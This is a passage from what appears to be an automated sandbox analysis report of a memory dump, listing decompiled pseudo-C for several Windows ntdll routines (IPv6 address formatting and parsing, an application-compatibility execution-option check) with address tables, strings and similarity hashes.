                                                                                                                                                  0x02558af4
                                                                                                                                                  0x02558a42
                                                                                                                                                  0x02558926
                                                                                                                                                  0x02558929
                                                                                                                                                  0x0255892c
                                                                                                                                                  0x0255892d
                                                                                                                                                  0x02558930
                                                                                                                                                  0x02558935
                                                                                                                                                  0x0255893a
                                                                                                                                                  0x02558b51
                                                                                                                                                  0x02558940
                                                                                                                                                  0x02558954
                                                                                                                                                  0x02558954
                                                                                                                                                  0x0255895a
                                                                                                                                                  0x025a1b63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558960
                                                                                                                                                  0x02558969
                                                                                                                                                  0x02558973
                                                                                                                                                  0x02558976
                                                                                                                                                  0x02558979
                                                                                                                                                  0x0255897e
                                                                                                                                                  0x02558981
                                                                                                                                                  0x02558981
                                                                                                                                                  0x02558986
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025a1b6e
                                                                                                                                                  0x025a1b74
                                                                                                                                                  0x025a1b7b
                                                                                                                                                  0x025a1b8f
                                                                                                                                                  0x025a1b91
                                                                                                                                                  0x025a1b91
                                                                                                                                                  0x025a1b99
                                                                                                                                                  0x025a1b9c
                                                                                                                                                  0x025a1ba2
                                                                                                                                                  0x025a1ba2
                                                                                                                                                  0x0255898c
                                                                                                                                                  0x02558992
                                                                                                                                                  0x02558999
                                                                                                                                                  0x025589ad
                                                                                                                                                  0x025a1ba8
                                                                                                                                                  0x025a1ba8
                                                                                                                                                  0x025589ad
                                                                                                                                                  0x025589b6
                                                                                                                                                  0x025589c8
                                                                                                                                                  0x025589cd
                                                                                                                                                  0x025589d0
                                                                                                                                                  0x025589d0
                                                                                                                                                  0x025589d6
                                                                                                                                                  0x025589e8
                                                                                                                                                  0x025589e8
                                                                                                                                                  0x025589ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025589ed
                                                                                                                                                  0x0255895a
                                                                                                                                                  0x0255883e
                                                                                                                                                  0x02558841
                                                                                                                                                  0x02558844
                                                                                                                                                  0x02558845
                                                                                                                                                  0x02558848
                                                                                                                                                  0x0255884d
                                                                                                                                                  0x02558852
                                                                                                                                                  0x02558b49
                                                                                                                                                  0x02558858
                                                                                                                                                  0x0255886c
                                                                                                                                                  0x0255886c
                                                                                                                                                  0x02558872
                                                                                                                                                  0x025a1b0e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558878
                                                                                                                                                  0x02558881
                                                                                                                                                  0x0255888b
                                                                                                                                                  0x0255888e
                                                                                                                                                  0x02558891
                                                                                                                                                  0x02558896
                                                                                                                                                  0x02558899
                                                                                                                                                  0x02558899
                                                                                                                                                  0x0255889e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025a1b21
                                                                                                                                                  0x025a1b27
                                                                                                                                                  0x025a1b2e
                                                                                                                                                  0x025a1b42
                                                                                                                                                  0x025a1b44
                                                                                                                                                  0x025a1b44
                                                                                                                                                  0x025a1b4c
                                                                                                                                                  0x025a1b4f
                                                                                                                                                  0x025a1b55
                                                                                                                                                  0x025a1b55
                                                                                                                                                  0x025588a4
                                                                                                                                                  0x025588aa
                                                                                                                                                  0x025588b1
                                                                                                                                                  0x025588c5
                                                                                                                                                  0x025a1b5b
                                                                                                                                                  0x025a1b5b
                                                                                                                                                  0x025588c5
                                                                                                                                                  0x025588ce
                                                                                                                                                  0x025588e0
                                                                                                                                                  0x025588e5
                                                                                                                                                  0x025588e8
                                                                                                                                                  0x025588e8
                                                                                                                                                  0x025588ee
                                                                                                                                                  0x02558900
                                                                                                                                                  0x02558900
                                                                                                                                                  0x02558905
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558905

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 02558827
                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 025589FC
                                                                                                                                                  • WindowsExcludedProcs, xrefs: 025587C1
                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 025587E6
                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 02558914
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcspbrk
                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                  • API String ID: 402402107-258546922
                                                                                                                                                  • Opcode ID: ed4a9ba0782b870ce569749aa0ada4372d980c72b55ca5998c227373e1c16718
                                                                                                                                                  • Instruction ID: f9cfe3c141921af4e8ead161140065dfcbf1465854e6abc7539978602ea76470
                                                                                                                                                  • Opcode Fuzzy Hash: ed4a9ba0782b870ce569749aa0ada4372d980c72b55ca5998c227373e1c16718
                                                                                                                                                  • Instruction Fuzzy Hash: 83F108B2D00219EFCF11DF94C995AEEBBB9FF48304F14446AE905A7210E734AA45CF68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 025713CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                  			E025713CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02567707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2532926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02567707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2539cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02567707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02567707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02567707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02567707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                  0x025713d5
                                                                                                                                                  0x025713d9
                                                                                                                                                  0x025713dc
                                                                                                                                                  0x025713de
                                                                                                                                                  0x025713e1
                                                                                                                                                  0x025713e8
                                                                                                                                                  0x025713ee
                                                                                                                                                  0x0259e8fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259e921
                                                                                                                                                  0x0259e921
                                                                                                                                                  0x0259e928
                                                                                                                                                  0x0259e982
                                                                                                                                                  0x0259e98a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259e99a
                                                                                                                                                  0x0259e99e
                                                                                                                                                  0x0259e9a3
                                                                                                                                                  0x0259e9a8
                                                                                                                                                  0x0259e9b9
                                                                                                                                                  0x0259e978
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259e978
                                                                                                                                                  0x0259e98a
                                                                                                                                                  0x0259e92a
                                                                                                                                                  0x0259e931
                                                                                                                                                  0x0259e944
                                                                                                                                                  0x0259e944
                                                                                                                                                  0x0259e950
                                                                                                                                                  0x0259e954
                                                                                                                                                  0x0259e959
                                                                                                                                                  0x0259e95e
                                                                                                                                                  0x0259e963
                                                                                                                                                  0x0259e970
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259e975
                                                                                                                                                  0x0259e93b
                                                                                                                                                  0x0259e980
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259e980
                                                                                                                                                  0x0259e942
                                                                                                                                                  0x0259e94b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259e94b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259e942
                                                                                                                                                  0x025713f4
                                                                                                                                                  0x025713f4
                                                                                                                                                  0x025713f9
                                                                                                                                                  0x025713fc
                                                                                                                                                  0x025713ff
                                                                                                                                                  0x02571406
                                                                                                                                                  0x0259e9cc
                                                                                                                                                  0x0259e9d2
                                                                                                                                                  0x0259e9d2
                                                                                                                                                  0x0259e9cc
                                                                                                                                                  0x0257140c
                                                                                                                                                  0x02571411
                                                                                                                                                  0x02571431
                                                                                                                                                  0x0257143a
                                                                                                                                                  0x0257143c
                                                                                                                                                  0x0257143f
                                                                                                                                                  0x0257143f
                                                                                                                                                  0x02571442
                                                                                                                                                  0x02571447
                                                                                                                                                  0x025714a8
                                                                                                                                                  0x025714ac
                                                                                                                                                  0x0259e9e2
                                                                                                                                                  0x0259e9e7
                                                                                                                                                  0x0259e9ec
                                                                                                                                                  0x0259ea05
                                                                                                                                                  0x0259ea05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02571449
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02571449
                                                                                                                                                  0x0257144c
                                                                                                                                                  0x02571459
                                                                                                                                                  0x02571462
                                                                                                                                                  0x02571469
                                                                                                                                                  0x0257146a
                                                                                                                                                  0x02571470
                                                                                                                                                  0x02571473
                                                                                                                                                  0x02571476
                                                                                                                                                  0x02571476
                                                                                                                                                  0x02571490
                                                                                                                                                  0x02571495
                                                                                                                                                  0x0257138e
                                                                                                                                                  0x02571390
                                                                                                                                                  0x02571397
                                                                                                                                                  0x02571398
                                                                                                                                                  0x02571399
                                                                                                                                                  0x025713a1
                                                                                                                                                  0x025713a4
                                                                                                                                                  0x025713a4
                                                                                                                                                  0x02571498
                                                                                                                                                  0x0257149c
                                                                                                                                                  0x0257149f
                                                                                                                                                  0x025714a2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025714a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025714a4
                                                                                                                                                  0x02571413
                                                                                                                                                  0x02571415
                                                                                                                                                  0x02571416
                                                                                                                                                  0x02571419
                                                                                                                                                  0x0257141c
                                                                                                                                                  0x02571422
                                                                                                                                                  0x025713b7
                                                                                                                                                  0x025713bc
                                                                                                                                                  0x025713bf
                                                                                                                                                  0x025713bf
                                                                                                                                                  0x025713c2
                                                                                                                                                  0x02571424
                                                                                                                                                  0x02571424
                                                                                                                                                  0x02571424
                                                                                                                                                  0x02571427
                                                                                                                                                  0x0257142b
                                                                                                                                                  0x0257142c
                                                                                                                                                  0x0257142c
                                                                                                                                                  0x0257142c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0257141c
                                                                                                                                                  0x02571411

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: ca39c414ede019db7aa83c0d8719a61563c027809485fcae73852bb22b93ea1c
                                                                                                                                                  • Instruction ID: a2e712867c7604122859c54cab7cfc449a53ff438eaaf38f5b5201e84fc001e3
                                                                                                                                                  • Opcode Fuzzy Hash: ca39c414ede019db7aa83c0d8719a61563c027809485fcae73852bb22b93ea1c
                                                                                                                                                  • Instruction Fuzzy Hash: F66135B1D10A56AADF34CF69D8809BEBFB6FF84304B14C52EE49A47640D774A640CB68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 02567EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E02567EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2612088; // 0x7775eb7f
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02567F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02583F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0253DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2614218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02583F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02540D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02583F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02548375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02583F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E025AE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02583F92();
					_t38 = 1;
					L2:
					return E0253E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                  0x02567f08
                                                                                                                                                  0x02567f0f
                                                                                                                                                  0x02567f12
                                                                                                                                                  0x02567f1b
                                                                                                                                                  0x02567f31
                                                                                                                                                  0x02583ead
                                                                                                                                                  0x02583eb4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02583eba
                                                                                                                                                  0x02583ecd
                                                                                                                                                  0x02583ed2
                                                                                                                                                  0x02583ee1
                                                                                                                                                  0x02583ee7
                                                                                                                                                  0x02583eec
                                                                                                                                                  0x02583f12
                                                                                                                                                  0x02583f18
                                                                                                                                                  0x02583f1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02583f20
                                                                                                                                                  0x02583f26
                                                                                                                                                  0x02583f28
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02583f2e
                                                                                                                                                  0x02583f30
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02583f3a
                                                                                                                                                  0x02583f3b
                                                                                                                                                  0x02583f53
                                                                                                                                                  0x02583f64
                                                                                                                                                  0x02583f69
                                                                                                                                                  0x02583f6c
                                                                                                                                                  0x02583f6d
                                                                                                                                                  0x02583f6f
                                                                                                                                                  0x0258e304
                                                                                                                                                  0x0258e30f
                                                                                                                                                  0x0258e315
                                                                                                                                                  0x0258e31e
                                                                                                                                                  0x0258e321
                                                                                                                                                  0x0258e327
                                                                                                                                                  0x0258e329
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0258e32f
                                                                                                                                                  0x0258e32f
                                                                                                                                                  0x0258e337
                                                                                                                                                  0x0258e33a
                                                                                                                                                  0x0258e33b
                                                                                                                                                  0x0258e33d
                                                                                                                                                  0x0258e33f
                                                                                                                                                  0x0258e341
                                                                                                                                                  0x0258e341
                                                                                                                                                  0x0258e34e
                                                                                                                                                  0x0258e353
                                                                                                                                                  0x0258e358
                                                                                                                                                  0x0258e35d
                                                                                                                                                  0x0258e35f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0258e365
                                                                                                                                                  0x0258e365
                                                                                                                                                  0x0258e368
                                                                                                                                                  0x0258e36e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0258e374
                                                                                                                                                  0x0258e32f
                                                                                                                                                  0x02583f75
                                                                                                                                                  0x02583f7a
                                                                                                                                                  0x02583f7c
                                                                                                                                                  0x02583f7e
                                                                                                                                                  0x02583f86
                                                                                                                                                  0x02567f39
                                                                                                                                                  0x02567f47
                                                                                                                                                  0x02567f47
                                                                                                                                                  0x02567f37
                                                                                                                                                  0x02567f37
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02583F12
                                                                                                                                                  Strings
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02583F4A
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02583F75
                                                                                                                                                  • Execute=1, xrefs: 02583F5E
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0258E2FB
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02583EC4
                                                                                                                                                  • ExecuteOptions, xrefs: 02583F04
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 0258E345
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BaseDataModuleQuery
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                  • API String ID: 3901378454-484625025
                                                                                                                                                  • Opcode ID: 6074a8e63d74d4826a33f2f664a208d766127a78920791e1fcde43a93bda7cec
                                                                                                                                                  • Instruction ID: 985f9b13762e34e94a31ebfd81fe99c62934da3e2ac286fb9a003977845bcd65
                                                                                                                                                  • Opcode Fuzzy Hash: 6074a8e63d74d4826a33f2f664a208d766127a78920791e1fcde43a93bda7cec
                                                                                                                                                  • Instruction Fuzzy Hash: EE41DD3164071DBAEB21AA54DCC9FEAF3BDFF58714F000599A505F7080EB70AA458FA9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 02570B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E02570B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02548980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0253DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02570CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02570CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E025706BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E025706BA(_t135, _t178) == 0 || E02570A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02570CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02570CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E025706BA(_t123, _t141) == 0 || _t124 == 0) {
